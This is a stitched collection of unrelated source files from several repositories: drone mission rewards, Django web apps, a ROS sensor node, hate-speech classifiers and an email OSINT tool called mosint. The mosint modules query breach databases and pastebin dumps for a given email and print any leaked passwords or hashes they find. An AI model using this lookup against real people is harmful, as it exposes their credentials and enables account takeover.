info['goal_probability'] = 0
return info
def mission_reward(self, ugv, uav, config):
"""Caculated the total mission reward depending on the progress
Parameters
----------
ugv : list
List of all UGVs
uav : list
List of all UAVs
config : yaml
The configuration file
Returns
-------
float
The reward for the mission at an instant of time.
"""
# Simulation parameters
total_time = config['simulation']['total_time']
goals = config['simulation']['goal_node']
# UAV reward weight parameters
w_time_uav = config['weights']['w_time_uav']
w_battery_uav = config['weights']['w_battery_uav']
w_b_UAV_0 = 1 # Need to implement
# Reward for UAV
r_uav_time = 0
r_uav_battery = 0
# Calculate the reward for UAV
for vehicle in uav:
r_uav_battery += w_battery_uav * vehicle.battery / w_b_UAV_0
for goal in goals:
position, _ = vehicle.get_pos_and_orientation()
info = self.goal_information(goal, self.config)
time_to_goal = self.get_time_dist(vehicle,
info['goal_position'])
r_uav_time += w_time_uav * (1 - info['goal_progress']) * (
total_time - time_to_goal) / total_time
# Reward for UGV
r_ugv_time = 0
r_ugv_ammo = 0
# UGV reward weight parameters
w_time_ugv = config['weights']['w_time_ugv']
w_battery_ugv = config['weights']['w_ammo_ugv']
w_b_ugv_0 = 1 # Need to implement
# Calculate the reward for UGV
for vehicle in ugv:
r_ugv_ammo += w_battery_ugv * vehicle.ammo / w_b_ugv_0
for goal in goals:
position, _ = vehicle.get_pos_and_orientation()
info = self.goal_information(goal, self.config)
time_to_goal = self.get_time_dist(vehicle,
info['goal_position'])
r_ugv_time += w_time_ugv * (1 - info['goal_progress']) * (
total_time - time_to_goal) / total_time
# Search reward parameters
w_search = self.config['weights']['w_search']
# mission_success = self.config['weights']['mission_success']
r_search = 0
for target in self.state_manager.target:
r_search += w_search * target['progress_goals']
# for vehicle in ugv:
# position = vehicle.get_pos_and_orientation()
# for goal in range(n_goals):
# info = goal_information(goal)
# time_to_goal = get_time_dist(vehicle, info['goal_position'])
# # Need to implement inside buidling search
# # inside_search_time = get_t_search_inside(info['perimeter'] * # noqa
# # info['floors'])
# # r_search += w_search * info['goal_probability'] * info[
# # 'goal_progress'] * (total_time -
# # inside_search_time) / total_time
reward = r_ugv_time + r_ugv_ammo + r_uav_time + r_uav_battery + r_search # noqa
return reward
```
#### File: offset-game/gui/information.py
```python
import pygame
def get_window_size(screen_size):
size = (0.225 * screen_size[0], 0.75 * screen_size[1])
return size
def get_position(screen_size):
position = (10 + 0.75 * screen_size[0], 5 + 0.0 * screen_size[1])
return position
class Information(pygame.sprite.Sprite):
def __init__(self, screen, screen_size):
super().__init__()
self.position = get_position(screen_size)
self.surface = pygame.Surface(get_window_size(screen_size))
self.surface.fill((0, 0, 0))
screen.blit(self.surface, self.position)
def update(self, screen):
self.surface.fill(pygame.Color('dodgerblue'))
``` |
{
"source": "josephdoan0105/mosint",
"score": 3
} |
#### File: mosint/insides/Header.py
```python
from insides.bcolors import bcolors
def Header(title):
print("")
print("-------------------------------")
print(f"{bcolors.OKGREEN}>{bcolors.ENDC}"+title)
print("-------------------------------")
```
#### File: mosint/modules/LeakedDB.py
```python
import requests
from insides.bcolors import bcolors
from prettytable import PrettyTable
def LeakedDB(mail,_verbose=None):
if _verbose != None:
try:
res = requests.get(f"https://scylla.sh/search?q=email:{mail}&size=50&start=0", headers={'Accept': 'application/json'}).json()
table = PrettyTable(["Domain","Email",f"{bcolors.FAIL}Password{bcolors.ENDC}"])
if len(res):
for s in res:
table.add_row([s["fields"]["domain"],s["fields"]["email"],s["fields"].get("password") or s["fields"].get("passhash") or "No Pass Data"])
print(table)
else:
print(f"{bcolors.FAIL}No leaked accounts found!{bcolors.ENDC}")
except Exception as e:
print(e)
print(f"{bcolors.FAIL}Leaked DB Connection Error!{bcolors.ENDC}")
```
#### File: mosint/modules/Psbdmp.py
```python
from bs4 import BeautifulSoup
import json, requests
from insides.bcolors import bcolors
def Psbdmp(mail,_verbose=None):
if _verbose != None:
try:
print(f"{bcolors.WARNING} -- Scanning Pastebin Dumps...{bcolors.ENDC}\n")
res = requests.get(f"https://psbdmp.ws/api/search/{mail}",headers={ "Accept": "application/json" }).json().get('data') or []
if len(res):
for i in res:
print(f"{bcolors.OKGREEN}|-- {bcolors.ENDC}"+"https://pastebin.com/"+i['id'])
else:
print(f"{bcolors.FAIL}No psbdump records found!{bcolors.ENDC}")
except:
print(f"{bcolors.FAIL}Psbdump Error!{bcolors.ENDC}")
```
#### File: josephdoan0105/mosint/mosint.py
```python
import json, re
from insides.bcolors import bcolors
from insides.Header import Header
def parse_args():
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('-e', '--email', type=str, required=True, help="Email")
return parser.parse_args()
# TODO: Clean boolean in string.
def main():
args = parse_args()
mail = args.email
EMAIL_REGEX = r'(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\.[a-zA-Z0-9-.]+$)'
if not re.match(EMAIL_REGEX, mail):
print(f"{bcolors.FAIL}Email format is wrong!{bcolors.ENDC}")
exit()
with open('config.json', "r") as configFile:
conf = json.loads(configFile.read())
for i in conf:
verifyApi = (i['verify-email.org API Key'])
socialscan = (i['Social Scan'])
leakeddb = (i['Leaked DB'])
breachedsites = (i['Breached Sites[leak-lookup.com API Key]'])
hunterApi = (i['hunter.io API Key'])
checkPDF = (i['PDF Check for Related Emails'])
dbdata = (i['Related Phone Numbers'])
tcrwd = (i['Related Domains'])
pastebindumps = (i['Pastebin Dumps'])
googlesearch = (i['Google Search'])
dns = (i['DNS Lookup'])
from insides.Banner import Banner
Banner()
from modules.ConfigTree import ConfigTree
ConfigTree(verifyApi,socialscan,leakeddb,breachedsites,hunterApi,checkPDF,dbdata,tcrwd,pastebindumps,googlesearch,dns,_verbose=True)
print("")
if (verifyApi != ""):
from modules.VerifyMail import VerifyMail
title = "VERIFICATION SERVICE"
Header(title)
VerifyMail(verifyApi,mail,_verbose=True)
if (socialscan == "True" or socialscan == "T" or socialscan == "true"):
from modules.SocialScan import SocialScan
title = "SOCIAL SCAN"
Header(title)
SocialScan(mail,_verbose=True)
if (leakeddb == "True" or leakeddb == "T" or leakeddb == "true"):
from modules.LeakedDB import LeakedDB
title = "LEAKED DB [Password dumps]"
Header(title)
LeakedDB(mail,_verbose=True)
if (breachedsites != ""):
from modules.BreachedSites import BreachedSites
title = "BREACHED SITES"
Header(title)
BreachedSites(mail,breachedsites,_verbose=True)
if (hunterApi != ""):
from modules.Hunter import Hunter
title = "RELATED EMAILS"
Header(title)
Hunter(mail,hunterApi,_verbose=True)
if (checkPDF == "True" or checkPDF == "T" or checkPDF == "true"):
from modules.PDFcheck import PDFcheck
title = "RELATED EMAILS IN PDFs"
Header(title)
PDFcheck(mail,_verbose=True)
if (dbdata == "True" or dbdata == "T" or dbdata == "true"):
from modules.RelatedNumbers import RelatedNumbers
title = "RELATED PHONE NUMBERS"
Header(title)
RelatedNumbers(mail,_verbose=True)
if (tcrwd == "True" or tcrwd == "T" or tcrwd == "true"):
from modules.RelatedDomains import RelatedDomains
title = "RELATED DOMAINS"
Header(title)
RelatedDomains(mail,_verbose=True)
if (pastebindumps == "True" or pastebindumps == "T" or pastebindumps == "true"):
from modules.Psbdmp import Psbdmp
title = "PASTEBIN DUMPS"
Header(title)
Psbdmp(mail,_verbose=True)
if (googlesearch == "True" or googlesearch == "T" or googlesearch == "true"):
from modules.Googling import Googling
title = "GOOGLING"
Header(title)
Googling(mail,_verbose=True)
if (dns == "True" or dns == "T" or dns == "true"):
from modules.DNS import DNS
title = "DNS LOOKUP"
Header(title)
DNS(mail,_verbose=True)
main()
``` |
{
"source": "joseph-d-p/altair",
"score": 2
} |
#### File: examples/tests/test_examples.py
```python
import pkgutil
import pytest
from altair.utils.execeval import eval_block
from altair import examples
def iter_example_filenames():
for importer, modname, ispkg in pkgutil.iter_modules(examples.__path__):
if ispkg or modname.startswith('_'):
continue
yield modname + '.py'
@pytest.mark.parametrize('filename', iter_example_filenames())
def test_examples(filename):
source = pkgutil.get_data(examples.__name__, filename)
chart = eval_block(source)
if chart is None:
raise ValueError("Example file should define chart in its final "
"statement.")
chart.to_dict()
``` |
{
"source": "josephdubon/boilerplate_dubon_django_blog",
"score": 3
} |
#### File: blog/templatetags/blog_tags.py
```python
from django import template
from django.db.models import Count
from django.utils.safestring import mark_safe
import markdown
from ..models import Post
register = template.Library()
####
# Register as simple tags
####
# A simple template tag that returns the number of posts published so far.=
@register.simple_tag
def total_posts():
return Post.published.count()
# A simple template tag that displays the 5 most commented posts
@register.simple_tag
def get_most_commented_posts(count=5):
# Build a QuerySet using the annotate() function to aggregate the
# - total number of comments for each post.
return Post.published.annotate(
# use the Count aggregation function to store the number of comments
# - in the computed field total_comments for each Post object.
total_comments=Count('comments')
).order_by('-total_comments')[:count]
####
# Register as inclusion_tags
####
# An inclusion tag that returns the 5 latest posts.
@register.inclusion_tag('blog/post/latest_posts.html')
def show_latest_posts(count=5):
latest_posts = Post.published.order_by('-publish')[:count]
return {
'latest_posts': latest_posts
}
####
# Register Template Filters
####
# A template filter to enable use of markdown .md syntax in blog posts and then converts
# - post contents to HTML in the templates
@register.filter(name='markdown')
def markdown_format(text):
return mark_safe(markdown.markdown(text))
``` |
{
"source": "josephdubon/boilerplate_image_share_app",
"score": 3
} |
#### File: boilerplate_image_share_app/account/forms.py
```python
from django import forms
from django.contrib.auth.models import User
from .models import Profile
# Login form
class LoginForm(forms.Form):
username = forms.CharField()
password = forms.CharField(widget=forms.PasswordInput)
# User registration form
class UserRegistrationForm(forms.ModelForm):
# two additional fieldsโpassword and password2
# โ for users to set their password and confirm it.
password = forms.CharField(label='Password',
widget=forms.PasswordInput)
password2 = forms.CharField(label='Repeat Password',
widget=forms.PasswordInput)
class Meta:
model = User
# Include only the username, first_name, and email fields of the model.
fields = (
'username',
'first_name',
'email',
)
def clean_password2(self):
cd = self.cleaned_data
# Use the field-specific clean_password2() validation.
if cd['password'] != cd['<PASSWORD>']:
raise forms.ValidationError('Passwords do not match.')
return cd['password2']
# Edit user form
class UserEditForm(forms.ModelForm):
class Meta:
model = User
fields = (
'first_name',
'last_name',
'email',
)
# Edit user profile form
class ProfileEditForm(forms.ModelForm):
class Meta:
model = Profile
fields = (
'date_of_birth',
'photo',
)
```
#### File: boilerplate_image_share_app/account/views.py
```python
from django.http import HttpResponse
from django.shortcuts import render
from django.contrib import messages
from django.contrib.auth import authenticate, login
from django.contrib.auth.decorators import login_required
from .forms import (
LoginForm,
UserRegistrationForm,
UserEditForm,
ProfileEditForm
)
from .models import Profile
# Login view
def user_login(request):
if request.method == "POST":
# Instantiate the form with the submitted data with form = LoginForm(request.POST).
form = LoginForm(request.POST)
# Check whether the form is valid with form.is_valid(). If it is not valid, you display
# - the form errors in your template (for example, if the user didn't fill in one of the fields).
if form.is_valid():
cd = form.cleaned_data
# Authenticate the user against the database using the authenticate() method.
user = authenticate(request,
username=cd['username'],
password=cd['password']
)
if user is not None:
# If user is registered and active log user in
if user.is_active:
login(request, user)
return HttpResponse('Authenticated successfully')
else:
# If user account is disabled
return HttpResponse('Disabled account')
else:
# If there user account does not exist
return HttpResponse('Invalid login')
else:
# Return clean form
form = LoginForm()
return render(request, 'account/login.html', {
'form': form
})
# Dashboard view
# Check if current user is authenticated
@login_required
def dashboard(request):
return render(request,
'account/dashboard.html',
{
'section': 'dashboard'
})
# User registration view
def register(request):
if request.method == 'POST':
user_form = UserRegistrationForm(request.POST)
if user_form.is_valid():
# Create a new user obj but don't save yet
new_user = user_form.save(commit=False)
# Set the chosen password
# For security reasons, instead of saving the raw password entered by the
# - user, you use the set_password() method of the user model that handles hashing.
new_user.set_password(
user_form.cleaned_data['password'])
# Save the user obj
new_user.save()
# Create the user an empty profile
Profile.objects.create(user=new_user)
return render(request,
'account/register_done.html',
{
'new_user': new_user
})
else:
user_form = UserRegistrationForm()
return render(request,
'account/register.html',
{
'user_form': user_form
})
# Edit user and profile view
@login_required
def edit(request):
if request.method == 'POST':
user_form = UserEditForm(instance=request.user,
data=request.POST)
profile_form = ProfileEditForm(
instance=request.user.profile,
data=request.POST,
files=request.FILES)
if user_form.is_valid() and profile_form.is_valid():
user_form.save()
profile_form.save()
# Send message to user on success
messages.success(request,
'Profile updated successfully')
else:
# Send message to user on fail
messages.error(request,
'Error updating your profile')
else:
user_form = UserEditForm(instance=request.user)
profile_form = ProfileEditForm(
instance=request.user.profile)
return render(request,
'account/edit.html',
{'user_form': user_form,
'profile_form': profile_form})
``` |
{
"source": "josephdubon/shoe-store-api",
"score": 3
} |
#### File: nutshell_config/nutshell_app/models.py
```python
from django.db import models
"""
Your Task
This assignment is to use Django REST framework and a fresh Django server
to create an API as a potential demo for a shoe store with the following
models, broken out for standardization:
Manufacturer
name: str
website: url
---
ShoeType
style: str
---
ShoeColor
color_name: str (ROYGBIV + white / black) -->
hint: https://docs.djangoproject.com/en/3.0/ref/models/fields/#choices
---
Shoe
size: int
brand name: str
manufacturer: FK (Foreign Key)
color: FK
material: str
shoe_type: FK
fasten_type: str
"""
# Manufacturer
class NSManufacturer(models.Model):
"""
name: str
website: url
"""
name = models.CharField(max_length=50, blank=True, default='')
website = models.URLField()
def __str__(self):
return self.name
# ShoeType
class NSShoeType(models.Model):
"""
style: str
"""
style = models.CharField(max_length=50, blank=True, default='')
def __str__(self):
return self.style
# ShoeColor
class NSShoeColor(models.Model):
"""
# color_name: str (ROYGBIV + white / black) -->
# hint: https://docs.djangoproject.com/en/3.0/ref/models/fields/#choices
"""
ROYGBIV = 'RYG'
WHITE = 'WH'
BLACK = 'BLK'
COLOR_NAME_CHOICES = [
(ROYGBIV, 'ROYGBIV'),
(WHITE, 'White'),
(BLACK, 'Black'),
]
color_name = models.CharField(
max_length=3,
choices=COLOR_NAME_CHOICES,
default=WHITE,
)
def __str__(self):
return self.color_name
# Shoe
class NSShoe(models.Model):
"""
size: int
brand name: str
manufacturer: FK (Foreign Key)
color: FK
material: str
shoe_type: FK
fasten_type: str
"""
size = models.IntegerField(blank=True, default='')
brand_name = models.CharField(max_length=50, blank=True, default='')
manufacturer = models.ForeignKey(NSManufacturer, on_delete=models.CASCADE, default='')
color = models.ForeignKey(NSShoeColor, on_delete=models.CASCADE)
material = models.CharField(max_length=25, blank=True, default='')
shoe_type = models.ForeignKey(NSShoeType, on_delete=models.CASCADE)
fasten_type = models.CharField(max_length=25, blank=True, default='')
def __str__(self):
return f'{self.size}{self.brand_name}{self.material}{self.fasten_type}'
``` |
{
"source": "josephdubon/twitter-clone-django",
"score": 2
} |
#### File: twitter-clone-django/tweet/views.py
```python
from django.contrib.auth.decorators import login_required
from django.http import HttpResponseRedirect
from django.shortcuts import render, reverse
from twitteruser.models import TwitterUser
from .models import Tweet
from .forms import CreateTweetForm
from twitterclone import settings
# Home tweet list view
@login_required
def tweet_home_view(request):
twitteruser_obj = request.user
tweets_total = Tweet.objects.filter(author=twitteruser_obj).count()
followers_total = twitteruser_obj.followers.count()
tweets = Tweet.objects.all().order_by('-create_time')
tweets = [tweet for tweet in tweets if tweet.author in request.user.followers.all() or request.user == tweet.author]
return render(request, 'home.html', {
'twitteruser_obj': twitteruser_obj,
'tweets_total': tweets_total,
'followers_total': followers_total,
'tweets': tweets,
}
)
# Tweet list view
@login_required
def tweet_list_view(request):
tweets = Tweet.objects.all().order_by('-create_time')
return render(request, 'tweet_list.html', {
'tweets': tweets,
}
)
# Tweet detail view
def tweet_detail_view(request, tweet_id):
tweet = Tweet.objects.get(id=tweet_id)
return render(request, 'tweet_detail.html', {
'tweet': tweet
}
)
# Create tweet view
@login_required
def create_tweet(request):
context = {}
if request.method == "POST":
form = CreateTweetForm(request.POST)
if form.is_valid():
data = form.cleaned_data
new_ticket = Tweet.objects.create(
title=data['title'],
author=request.user,
body=data['body'],
)
if new_ticket:
return HttpResponseRedirect(reverse('home'))
form = CreateTweetForm()
context.update({'form': form})
return render(
request,
'create_tweet.html',
context
)
```
#### File: twitter-clone-django/twitteruser/models.py
```python
from django.db import models
from django.contrib.auth.models import AbstractUser
class TwitterUser(AbstractUser):
followers = models.ManyToManyField(
'self',
related_name='follows',
symmetrical=False,
blank=True
)
bio = models.TextField(default='User has not written bio yet...')
update_time = models.DateTimeField(auto_now=True)
create_time = models.DateTimeField(auto_now_add=True)
def twitteruser_tweets(self):
return self.twitteruser_tweets()
def __str__(self):
return self.username
class Meta:
ordering = ('-create_time',)
``` |
{
"source": "josephduchesne/range_array",
"score": 3
} |
#### File: src/range_array/RangeNode.py
```python
from serial import Serial
import rospy, time, tf2_ros, tf_conversions, geometry_msgs
from sensor_msgs.msg import LaserScan
from sensor_msgs.msg import Range
serial_port = None
scan_pub = None
range_pub = []
# position of each sensor: x, y, yaw, pitch in m
range_pos = [[-0.23,0.055,-3.5*26, 11.2], [-0.1725, 0.015, -2.5*26, 11.2], [-0.115,0,-1.5*26, 11.2], [-0.0575, 0, -0.5*26, 11.2], \
[0.0575, 0, 0.5*26, 11.2], [0.115,0,1.5*26, 11.2], [0.1725, 0.015, 2.5*26, 11.2], [0.23,0.055,3.5*26, 11.2]]
def init(port):
global serial_port, scan_pub, range_pub
rospy.init_node('range_node') # Init ROS
# Initialize all publishers
scan_pub = rospy.Publisher('/range_array_scan', LaserScan, queue_size=1)
for i in range(0,8):
range_pub.append(rospy.Publisher('/range_pub_%d' % i, Range, queue_size=1))
# Connect to the arduino
print("Init Serial %s" % port)
serial_port = Serial(port, 115200, timeout=None, stopbits = 1)
time.sleep(1) #nap while the arduino boots
def parse_sensor_data(line):
global scan_pub, range_pub
# Handle debug text from the arduino
if "," not in line:
rospy.loginfo("RangeNode: %s" % line)
return
# Parse the range string into a float array
ranges = [float(x)/1000.0 for x in line.split(",")[::-1]]
if len(ranges) != 8:
rospy.logwarn("Received other than 8 scan ranges", ranges)
return
br = tf2_ros.TransformBroadcaster()
# msg = LaserScan()
# msg.header.frame_id = "base_link"
# msg.header.stamp = rospy.Time.now()
# msg.angle_increment = 26.0/180.0*3.141592
# msg.angle_min = msg.angle_increment*-3.5
# msg.angle_max = msg.angle_increment*3.5
# msg.range_min = 0.1
# msg.range_max = 4.0
# msg.ranges = ranges # reverse!
# scan_pub.publish(msg)
for i in range(0,8):
# Emit the range data for this range
rmsg = Range()
rmsg.header.frame_id = "base_link"
rmsg.header.stamp = rospy.Time.now()
rmsg.header.frame_id = "rangefinder_%d" % i
rmsg.min_range = 0.1
rmsg.max_range = 4.0
rmsg.field_of_view = 26.0/180.0*3.141592
rmsg.radiation_type = rmsg.INFRARED
rmsg.range = ranges[i]
range_pub[i].publish(rmsg)
# output the TF2 for this range
t = geometry_msgs.msg.TransformStamped()
t.header.stamp = rospy.Time.now()
t.header.frame_id = "base_footprint"
t.child_frame_id = rmsg.header.frame_id
t.transform.translation.x = range_pos[i][0]
t.transform.translation.y = range_pos[i][1]-0.2
t.transform.translation.z = 0.2
q = tf_conversions.transformations.quaternion_from_euler(0, -range_pos[i][3]/180.0*3.1415, range_pos[i][2]/180.0*3.1415-3.1415/2)
t.transform.rotation.x = q[0]
t.transform.rotation.y = q[1]
t.transform.rotation.z = q[2]
t.transform.rotation.w = q[3]
br.sendTransform(t)
def main():
global serial_port, scan_pub
init('/dev/ttyUSB1')
# Wait for serial lines, emitting ROS messages whenever one is received
rate = rospy.Rate(100)
while not rospy.is_shutdown():
while serial_port.inWaiting():
parse_sensor_data(serial_port.readline().strip())
rate.sleep()
if __name__ == '__main__':
try:
main()
except rospy.ROSInterruptException:
pass
``` |
{
"source": "josephDuque/FinalYearProjectQTNM_u1803982",
"score": 2
} |
#### File: 2_Trajectories/motionWLorentzForce/plotTrajectory.py
```python
import sys, getopt
import numpy as np
import matplotlib.cm as cm
import matplotlib.pyplot as plt
import matplotlib.cbook as cbook
import matplotlib.animation as animation
from mpl_toolkits.mplot3d import Axes3D
from scipy import ndimage
# ----------------------------------------------------------
plt.rcParams.update({
"text.usetex": True,
"font.size" : 12,
"font.family": "sans-serif",
"font.sans-serif": ["Helvetica"]})
# for Palatino and other serif fonts use:
plt.rcParams.update({
"text.usetex": True,
"font.size" : 12,
"font.family": "serif",
"font.serif": ["Palatino"],
})
# ----------------------------------------------------------
#print("backend", plt.rcParams["backend"])
#plt.rcParams["backend"] = "TkAgg" # doesn't actually set the backend
#matplotlib.use("TkAgg")
print("backend", plt.rcParams["backend"])
#print("sys.float_info.dig = ", sys.float_info.dig)
#print("sys.float_info.mant_dig = ", sys.float_info.mant_dig)
lowEps = np.finfo(float).eps*np.float(100.0)
#print("lower precision limit=",lowEps)
# ----------------------------------------------------------
def main(argv):
inputfile = ''
outputfile = ''
try:
opts, args = getopt.getopt(argv,"hi:o:",["ifile=","ofile="])
except getopt.GetoptError:
print('plotTrajectory.py -i <dataToPlotDile> -o <hardCopyFileName>');
sys.exit(2)
for opt, arg in opts:
if opt == '-h':
print('plotTrajectory.py -i <dataToPlotDile> -o <hardCopyFileName>');
sys.exit()
elif opt in ("-i", "--ifile"):
inputfile = arg
elif opt in ("-o", "--ofile"):
outputfile = arg
print('File with data to plot <Input file> is "', inputfile)
print('Filename of hard copy file <Output file> is "', outputfile)
# --- Reading data
t0,posx,posy,posz,ux,uy,uz = \
np.loadtxt(open(inputfile,'rt').readlines()[:-1], delimiter='\t', skiprows=12, unpack=True);
# --- Creating plot
#fig = plt.figure()
#ax = fig.add_subplot(projection='3d')
#scatter = ax.scatter(posx,posy,posz,c=posz,cmap='viridis',alpha=0.75)
# legend1 = ax.legend(*scatter.legend_elements(),
# loc="upper left", title=r"$z-$Position of a Cyclotron Trajectory",fontsize=12)
#ax.add_artist(legend1)
fig = plt.figure(figsize=(6,4.5), dpi=144)
ax = Axes3D(fig);
line = plt.plot(posx,posy,posz,lw=0.2,c='k')[0]
ax.view_init(azim=44.5,elev=15.)
ax.grid(True)
ax.set_xlabel(r'$x-$Position',fontsize=12)
ax.set_ylabel(r'$y-$Position',fontsize=12);
ax.set_zlabel(r'$z-$Position',fontsize=12);
# string01 = '$\max(\phi) = ' + str(np.amax(col07)) + '$'
# string02 = '$\min(\phi) = ' + str(np.amin(col07)) + '$'
# ax.text(2, 80.0, r"$\Pi_1 = \frac{p\,\rho\,c_0^2}{\mu}$", color="k", fontsize=18)
# ax.text(2, 74.0, r"$\Pi_2 = \frac{p\,c_0}{h_0}$", color="k", fontsize=18)
# ax.text(2, 68.0, r"$\mu = 1.3e-2, \, \rho=1005.0$", color="k", fontsize=18)
# ax.text(2, 60.0, string01, color="k", fontsize=18)
# ax.text(2, 55.0, string02, color="k", fontsize=18)
plt.show()
# -----------------------------------------------------------------
# Main function call
if __name__ == "__main__":
if (len(sys.argv)>1):
main(sys.argv[1:]);
else:
print('Please provide input file to plot.')
print('plotTrajectory.py -i <dataToPlotDile> -o <hardCopyFileName>');
# End of main function call
# -----------------------------------------------------------------
``` |
{
"source": "josephdviviano/omsignal",
"score": 2
} |
#### File: josephdviviano/omsignal/main.py
```python
import datetime
import logging
import pickle
import torch
import os
import experiments
import utils
import visualize
PKG_PATH = os.path.dirname(os.path.abspath(__file__))
# Adds a simple logger.
TSTAMP = datetime.datetime.now().strftime("%d%m%y_%Hh%M")
LOGNAME = os.path.join(PKG_PATH, 'logs/train_{}.log'.format(TSTAMP))
logging.basicConfig(filename=LOGNAME, level=logging.INFO)
LOGGER = logging.getLogger('train')
def main():
# Run model.
model, results = experiments.tspec()
# Plot training curves.
visualize.training(results)
# Save model.
torch.save(model,
os.path.join(PKG_PATH,
'models/best_tspec_model_{}.pt'.format(TSTAMP)))
# Save results.
utils.write_results(results,
os.path.join(PKG_PATH,
'models/best_tspec_results_{}.pkl'.format(TSTAMP)))
# Visualizations using non-shuffled data.
train_data = utils.Data(train=True, augmentation=True)
valid_data = utils.Data(train=False, augmentation=False)
visualize.spectra(train_data, log=False, name='spectra_train')
visualize.spectra(valid_data, log=False, name='spectra_valid')
visualize.timeseries(train_data, name='timeseries_train')
visualize.timeseries(valid_data, name='timeseries_valid')
visualize.pca(train_data)
visualize.tsne(train_data)
if __name__ == "__main__":
main()
``` |
{
"source": "josephdviviano/whatsinthebox",
"score": 2
} |
#### File: witb/utils/models.py
```python
from hatesonar import Sonar
from transformers import AutoTokenizer, AutoModelForSequenceClassification
import numpy as np
import pandas as pd
import torch
import torch.multiprocessing
import time
from torch.utils.data import TensorDataset, DataLoader, RandomSampler, SequentialSampler
import os
import multiprocessing
torch.multiprocessing.set_sharing_strategy('file_system')
#from cc_net import dedup, execution, jsonql, minify, perplexity, process_wet_file, text_normalizer
from witb.utils.textutils import normalize_line
import kenlm # type: ignore
import sentencepiece # type: ignore
from copy import copy
#class PerplexityRunner():
# def __init__():
class SonarRunner():
def __init__(self, threshold=20):
self._model = Sonar()
self.labels = {
'neither': 0,
'offensive_language': 1,
'hate_speech': 2}
self.threshold = threshold
def query(self, doc):
"""Runs all sentences across cores."""
labels = np.zeros(len(self.labels)) # Per sentence counts of labels.
scores = np.zeros(len(self.labels)) # Mean score per label.
# Remove short sentences.
sentences = [s for s in doc.sentences if len(s) > self.threshold]
n = len(sentences)
if n == 0:
return np.concatenate([labels, scores])
for sentence in sentences:
result = self._model.ping(text=sentence)
labels[self.labels[result['top_class']]] += 1 # Top class count.
if result['top_class'] == 'hate_speech':
print("SONAR ", sentence)
# Gets the numeric score for each class per sentence.
for r in result['classes']:
scores[self.labels[r['class_name']]] += r['confidence']
scores /= n # Take the mean.
return np.concatenate([labels, scores])
class DeLimitRunner():
def __init__(self, threshold=20, max_sentences=30):
self._model = AutoModelForSequenceClassification.from_pretrained(
"Hate-speech-CNERG/dehatebert-mono-english")
self.labels = {
'hate_speech': 0,
'normal': 1}
self._tokenizer = AutoTokenizer.from_pretrained(
"Hate-speech-CNERG/dehatebert-mono-english")
self.threshold = threshold
self.max_sentences = int(max_sentences)
self._n_cpu = multiprocessing.cpu_count()
if torch.cuda.is_available():
self._device = torch.device("cuda")
else:
self._device = torch.device('cpu')
self._model.to(self._device)
self._softmax = torch.nn.Softmax(dim=1)
def query(self, doc):
"""Runs all sentences across cores."""
os.environ['TOKENIZERS_PARALLELISM'] = 'false'
labels = np.zeros(len(self.labels)) # Per sentence counts of labels.
scores = np.zeros(len(self.labels)) # Mean score per label.
# Preprocess sentences (filter, add delimiters, tokenize).
# Sentences must be > 20 characters.
sentences = [s for s in doc.sentences if len(s) > self.threshold]
# Do the first n sentences only so we cap runtime.
if len(sentences) > self.max_sentences:
sentences = sentences[:self.max_sentences]
raw_sentences = copy(sentences)
sentences = ["[CLS] " + s + " [SEP]" for s in sentences]
sentencetexts=[s for s in sentences]
sentences = [self._tokenizer.tokenize(
s, padding='max_length', truncation=True) for s in sentences]
sentences = [
self._tokenizer.convert_tokens_to_ids(s) for s in sentences]
n = len(sentences)
# Create attention masks (check if this works correctly)
attention_masks = []
for sentence in sentences:
attention_masks.append([float(s > 0) for s in sentence])
if n == 0:
return np.concatenate([labels, scores])
dataset = TensorDataset(torch.LongTensor(sentences),
torch.LongTensor(attention_masks))
sampler = SequentialSampler(dataset)
dataloader = DataLoader(dataset,
sampler=sampler,
batch_size=self.max_sentences,
num_workers=1)
for i, batch in enumerate(dataloader):
sentence, mask = batch
sentence = sentence.to(self._device)
mask = mask.to(self._device)
with torch.no_grad():
logits = self._model(
sentence, token_type_ids=None, attention_mask=mask)[0]
softmax = self._softmax(logits).detach().cpu().numpy()
# Count sentences with each label.
idx = np.argmax(softmax, axis=1)
_labels = np.zeros(softmax.shape)
_labels[np.arange(_labels.shape[0]), idx] = 1
labels += _labels.sum(0)
# Get the hateful/nice sentences:
batch_size = sentence.shape[0]
batch_idx = np.arange(batch_size*i, batch_size*(i+1))
hate_idx = batch_idx[np.where(idx == 1)[0]]
nice_idx = batch_idx[np.where(idx == 0)[0]]
if len(hate_idx) > 0:
print("DELIMIT HATE:", np.array(raw_sentences)[hate_idx])
#print("DELIMIT NICE:", np.array(raw_sentences)[nice_idx])
#print('\n')
scores += softmax.sum(0) # Sum scores over batch dimension.
scores /= n # Take the mean.
return np.concatenate([labels, scores])
class PerplexRunner():
def __init__(self, threshold=20):
#TODO: generalize these paths.
self.sp_model = sentencepiece.SentencePieceProcessor(
'/home/mila/l/lucciona/cc_net/data/lm_sp/en.sp.model')
self._model= kenlm.Model(
'/home/mila/l/lucciona/cc_net/data/lm_sp/en.arpa.bin')
self.threshold = threshold
def pp(log_score, length):
return
def query(self, doc):
"""Runs all sentences across cores."""
# Remove short sentences.
sentences = [s for s in doc.sentences if len(s) > self.threshold]
n = len(sentences)
score= 0.000
if n == 0:
return -np.inf # Worst possible perplexity.
log_score, doc_length = 0, 0
for sentence in sentences:
sentence = normalize_line(sentence)
sentence = self.sp_model .encode_as_pieces(sentence)
log_score += self._model.score(" ".join(sentence))
doc_length += len(sentence) + 1
#score = (10.0 ** (-log_score / doc_length))
score = round(10.0 ** (-log_score/doc_length), 1)
return score
``` |
{
"source": "josephedradan/algorithms",
"score": 4
} |
#### File: algorithms/mathematics/find_all_possible_arithmetic_expressions_and_solve.py
```python
from __future__ import annotations
import traceback
from collections import defaultdict
from itertools import permutations, combinations_with_replacement, chain
from numbers import Real
from typing import Union, Set, Dict
class ArithmeticExpression:
"""
Arithmetic Expression that returns a value
"""
def __init__(self,
operand_lhs: Union[Real, ArithmeticExpression],
operand_rhs: Union[Real, ArithmeticExpression],
operator: str):
# Operands
self.operand_lhs = operand_lhs
self.operand_rhs = operand_rhs
# Operators
self.operator = operator
def __add__(self, other: Union[Real, ArithmeticExpression]) -> ArithmeticExpression:
return ArithmeticExpression(self, other, "+")
def __sub__(self, other: Union[Real, ArithmeticExpression]) -> ArithmeticExpression:
return ArithmeticExpression(self, other, "-")
def __mul__(self, other: Union[Real, ArithmeticExpression]) -> ArithmeticExpression:
return ArithmeticExpression(self, other, "*")
